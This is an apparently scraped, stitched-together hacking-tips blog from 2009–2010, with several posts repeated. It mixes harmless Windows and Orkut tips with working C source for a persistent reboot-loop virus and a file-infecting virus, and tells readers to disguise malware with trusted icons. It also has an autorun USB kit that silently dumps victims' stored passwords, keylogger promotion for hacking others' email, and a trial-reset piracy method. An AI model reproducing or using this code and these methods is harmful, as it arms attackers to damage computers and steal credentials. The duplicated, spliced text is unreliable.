Wednesday, January 6, 2010

where did you get themes

just log on to
http://www.funmastiunlimited.com/2009/11/world-of-warcraft-orkut-theme-01/

How to install Orkut themes in Firefox

*

Tags

Aamir Khan Abhishek Bachchan Aishwarya Rai Amisha Patel Amitabh Bachchan Amrita Rao Bikini Babes Bikini Beauties Celina Jaitley Claudia Ciesla Cosmopolitan Deepika Padukone FHM Filmfare Firefox Genelia D'Souza Giselle Monteiro Hansika Motwani Hot Models Hrithik Roshan Install Jacqueline Fernandez Kangana Ranaut Kareena Kapoor Katrina Kaif Kim Kardashian Kingfisher Babes Malaika Arora Marie Claire Maxim Minissha Lamba Namitha Orkut Theme Raima Sen Ranbir Kapoor Riya Sen Saif Ali Khan Salman Khan Sameera Reddy Shah Rukh Khan Shriya Saran South Beauties Trailers Verve Vidya Balan

*

Recent Comments

o Noor on Zarine Khan in Salman Khan’s Veer: First Look

o Nitin on Zarine Khan in Salman Khan’s Veer: First Look

o Mahek on Zarine Khan in Salman Khan’s Veer: First Look

o admin on World Of Warcraft Orkut Theme 01

o Prasad on World Of Warcraft Orkut Theme 01







How to install Orkut themes in Firefox

November 16, 2009 by admin

Filed under: Orkut Themes



To install Orkut themes in Firefox, you will have to first install Greasemonkey. Read the article: How to install Greasemonkey



After installing Greasemonkey, click on the ‘Download this Orkut Theme’ link from our website for the Orkut theme that you would like to install. Now follow the steps given below:



Method 1



Use this method if, on clicking the download link for a Orkut theme, a dialog box opens up as shown below. Click on the ‘Install’ button and the theme will be installed. Log in to your Orkut page, you will now be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.
Method 2




Use this method if, on clicking the download link for a Orkut theme, instead of a dialog box, a page opens up which contains software code. In this case, on the menu bar of Firefox browser, click on ‘Tools’ —–> Greasemonkey —–> ‘Install This Script’. The Orkut theme will then be installed. Log in to your Orkut page, you will now be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.



Method 3



Use this method if, on clicking the download link for a Orkut theme, a dialog box opens up as shown below. Click on the ‘Save File’ button. Save the file, for e.g. in ‘My Documents’. Go to ‘My Documents’ and select the downloaded userscript file, right-click on it and choose the ‘Open With’ option. Select Firefox as the option. Then you will have to use either Method 1 or Method 2 as explained above, to install the Orkut theme. When you log in to your Orkut page, you will then be able to see the Orkut theme that you installed. Refresh the web page (or press F5 key) in case the theme cannot be seen.

Tuesday, January 5, 2010

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….




Just try the following steps and you’ll get a call to your cell phone from your own number.







1. Just give a missed call to this number. You’ll not be charged!



+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number



3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.



4. She say’s- Your PIN cannot be processed and the call disconnects

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not…….




Just try the following steps and you’ll get a call to your cell phone from your own number.







1. Just give a missed call to this number. You’ll not be charged!



+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number



3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.



4. She say’s- Your PIN cannot be processed and the call disconnects

Home » C SOURCE CODES, VIRUS CREATION

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.



For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}



NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.



Compiling The Scource Code Into Executable Virus.



1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.



Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.



1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to



HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run





There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.



Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.



LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.



This process is repeated every time the PC is restarted.



NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.



AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)



After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.



For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.



The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

How to Create a Computer Virus?

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.






#include

#include

#include

#include

#include

#include



FILE *virus,*host;

int done,a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;



void main()

{

st=clock();

clrscr();

done=findfirst(“*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”rb”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL) goto next;

x=89088;

printf(“Infecting %s\n”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(“DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(“TIME TAKEN=%f SEC\n”,

(end-st)/CLK_TCK);

getch();

}



COMPILING METHOD:



BORLAND TC++ 3.0 (16-BIT):



1. Load the program in the compiler, press Alt-F9 to compile



2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)



3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)



4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)



5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect



BORLAND C++ 5.5 (32-BIT) :



1. Compile once,note down the generated EXE file length in bytes



2. Change the value of X in source code to this length in bytes



3. Recompile it.The new EXE file is ready to infect



HOW TO TEST:



1. Open new empty folder



2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)



3. Run the virus EXE file there you will see all the files in the current directory get infected.



4.All the infected files will be ready to reinfect

Home » HACKING FOR BEGINNERS, IP ADDRESS, NETWORK HACKS


In my earlier post I had discussed about how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com. Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.




1. Country in which the IP is located



2. Region



3. City



4. Latitude/Longitude



5. Zip Code



6. Time Zone



7. Name of the ISP



8. Internet Speed



9. Weather Station



10. Area Code and



11. Domain name associated with the IP address.



A sample snapshot of the results from ip2location.com is given below







You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.

How to Protect an Email Account from being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.




If this is the case, then what is the reason for many people to loose their accounts?

The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping. They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.



Are you confused? If so continue reading and you’ll come to know…



Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords. I’ll also mention how to protect your email account from these scams.



1. WEBSITE SPOOFING



Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.



For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and loose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.



Solution:



■Never try to login/access your email account from the sites other than the original site.

■Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.

2. BY USING KEYLOGGERS



The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.



Solution:



Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES



Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.



This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.



So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

How to Hack an Email – Email Hacking

How to Hack Email




--------------------------------------------------------------------------------

Everyday I get a lot of emails wherein my readers ask me How to Hack an Email? You as the reader are most likely reading this because you want to hack into someone’s email. So in this post I have decided to uncover the real and working ways to hack any email.







Is it possible to hack emails?



Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways of hacking email, the following are the things you should be aware of.



1. There is no ready made software that can hack emails just with a click of a button. So if you come accross a site selling “Email Hacking software” plz don’t trust it.



2. Never trust any email hacking service that claims to hack any email just for $100 or $200. All of the email hacking services are scam.



3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other email hacking methods are simply scam or don’t work. The following are the only 2 working and foolproof methods for email hacking.



1. EASIEST WAY TO HACK EMAIL





The easiest way to hack an email is by using a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keyloggers as the best for hacking email.



SniperSpy





Win-Spy













I don’t have physical access to the target computer, can I still use sniperspy?



Yes you can still use it for hacking email. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.























Click Here to Order SniperSpy Now!





NOTE: For more details on keylogger read my post How to use Keyloggers



2. OTHER WAYS TO HACK EMAIL





The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers for hacking email since it’s the easiest one.



I hope this info has helped you. Happy Email Hacking!

How to Hack an Email – Email Hacking

How to Hack Email




--------------------------------------------------------------------------------

Everyday I get a lot of emails wherein my readers ask me How to Hack an Email? You as the reader are most likely reading this because you want to hack into someone’s email. So in this post I have decided to uncover the real and working ways to hack any email.







Is it possible to hack emails?



Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways of hacking email, the following are the things you should be aware of.



1. There is no ready made software that can hack emails just with a click of a button. So if you come accross a site selling “Email Hacking software” plz don’t trust it.



2. Never trust any email hacking service that claims to hack any email just for $100 or $200. All of the email hacking services are scam.



3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other email hacking methods are simply scam or don’t work. The following are the only 2 working and foolproof methods for email hacking.



1. EASIEST WAY TO HACK EMAIL





The easiest way to hack an email is by using a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keyloggers as the best for hacking email.



SniperSpy





Win-Spy













I don’t have physical access to the target computer, can I still use sniperspy?



Yes you can still use it for hacking email. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.























Click Here to Order SniperSpy Now!





NOTE: For more details on keylogger read my post How to use Keyloggers



2. OTHER WAYS TO HACK EMAIL





The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers for hacking email since it’s the easiest one.



I hope this info has helped you. Happy Email Hacking!

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.




What is SPAM?



Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.



Where do these SPAM come from?



These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.



Why do spammers SPAM?



The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.



Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.



From where do SPAMmers get my email address?



On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.



Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.



Is SPAMming legal?



Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.



How to protect my email account from getting SPAMmed?



The following methods can be used to combat email spam.



1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.



2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.



3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.



4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.



5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.



I hope this helps. Pass your suggestions and feedback via comments.

Get Rid of the Recycle Bin on your Desktop


Here is a way to remove the recycle bin from your desktop.This trick help’s people who want to get rid of the recycle bin on the desktop.












1.Goto start,Run,Type “gpedit.msc” (Type without quotes)



2.On the left panel,under User Configuration expand the tree Administrative templates



3.Click on the subtree desktop (single click,do not expand it)



4.On the right panel,Select the option-Remove Recycle Bin icon from desktop properties



5.Double click the option,on the settings tab just select the option enabled,press OK & exit the window.



6.Refesh the desktop (press F5) ,Your Recycle Bin vanishous

Forgot Windows XP Password ?


Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it.If you somehow manage to login as an Administrator then you can change the password without knowing it.




Heres the Step-By-Step instructions



1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.



2. Select the option “Manage”.



3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded)



4. Double click “Local Users and Groups” option From “System Tools” tree.



5. Click the “Users” option.



6. Now you will see the list of users on the right side pane,such as Administrator,Guest etc.



7. Right click the “Administrator” and select the option “Set Password” option.



8. Now you will see a warning message,Click on proceed.



9. Now the system asks you for “New Password” and “Confirm Password” .



10. After entering the password click on “OK”.The password is changed.That’s It!

Customize Windows Media Player Title Bar



This hack allows you to change the title bar from Windows Media Player to Windows Media Player provided by . So if you enter the text[GoHacking.Com], it would read: Windows Media Player provided by GoHacking.Com



1. Goto Run(Win+R)



2. Type “regedit” (without quotes) in the run dialogue box .



3. In the registry editor navigate to



HKEY_CURRENT_USER\Software\Policies\Microsoft



4. Create the Key [WindowsMediaPlayer].



Modify/Create the Value Name [TitleBar] according to the Value Data listed below.



Data Type: REG_SZ [String Value] // Value Name: TitleBar

Value Data: [Enter the text to be displayed in the title bar.]



5. Exit Registry editor and reboot.

Home » OTHERS, VISTA HACKS, XP HACKS


In this post I’ll show you how to hack a Software and run the trial program forever.Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period.Isn’t this interesting?




Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.



When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.



So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.



RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.



RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.



NOTE: FOLLOW THESE TIPS CAREFULLY



You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.



1. Note down the date and time, when you install the software for the first time.



2. Once the trial period expires, you must always run the software using RunAsDate.



3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.



4. It is better and safe to inject the date of the last day in the trial period.



For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.



I hope this helps! Please express your experience and opinions through comments

How to Sniff Passwords Using USB Drive





MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.



Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.



IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0



Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…



PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



Here is a step by step procedre to create the password hacking toolkit.



NOTE: You must temporarily disable your antivirus before following these steps.



1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.



ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.



2. Create a new Notepad and write the following text into it



[autorun]

open=launch.bat

ACTION= Perform a Virus Scan



save the Notepad and rename it from



New Text Document.txt to autorun.inf



Now copy the autorun.inf file onto your USB pendrive.



3. Create another Notepad and write the following text onto it.



start mspass.exe /stext mspass.txt



start mailpv.exe /stext mailpv.txt



start iepv.exe /stext iepv.txt



start pspv.exe /stext pspv.txt



start passwordfox.exe /stext passwordfox.txt



save the Notepad and rename it from



New Text Document.txt to launch.bat



Copy the launch.bat file also to your USB drive.



Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps



1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).



2. In the pop-up window, select the first option (Perform a Virus Scan).



3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.



4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.



This hack works on Windows 2000, XP and Vista





MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.



Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.



IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0



Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…



PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



Here is a step by step procedre to create the password hacking toolkit.



NOTE: You must temporarily disable your antivirus before following these steps.



1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.



ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.



2. Create a new Notepad and write the following text into it



[autorun]

open=launch.bat

ACTION= Perform a Virus Scan



save the Notepad and rename it from



New Text Document.txt to autorun.inf



Now copy the autorun.inf file onto your USB pendrive.



3. Create another Notepad and write the following text onto it.



start mspass.exe /stext mspass.txt



start mailpv.exe /stext mailpv.txt



start iepv.exe /stext iepv.txt



start pspv.exe /stext pspv.txt



start passwordfox.exe /stext passwordfox.txt



save the Notepad and rename it from



New Text Document.txt to launch.bat



Copy the launch.bat file also to your USB drive.



Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps



1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).



2. In the pop-up window, select the first option (Perform a Virus Scan).



3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.



4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.



This hack works on Windows 2000, XP and Vista

How to Make a Trojan Horse


Home » C SOURCE CODES, VIRUS CREATION, VISTA HACKS, XP HACKS


How to Make a Trojan Horse

Submitted by Srikanth on Sunday, 5 April 200981 Comments.



Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…



Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.



Now lets move to the working of our Trojan



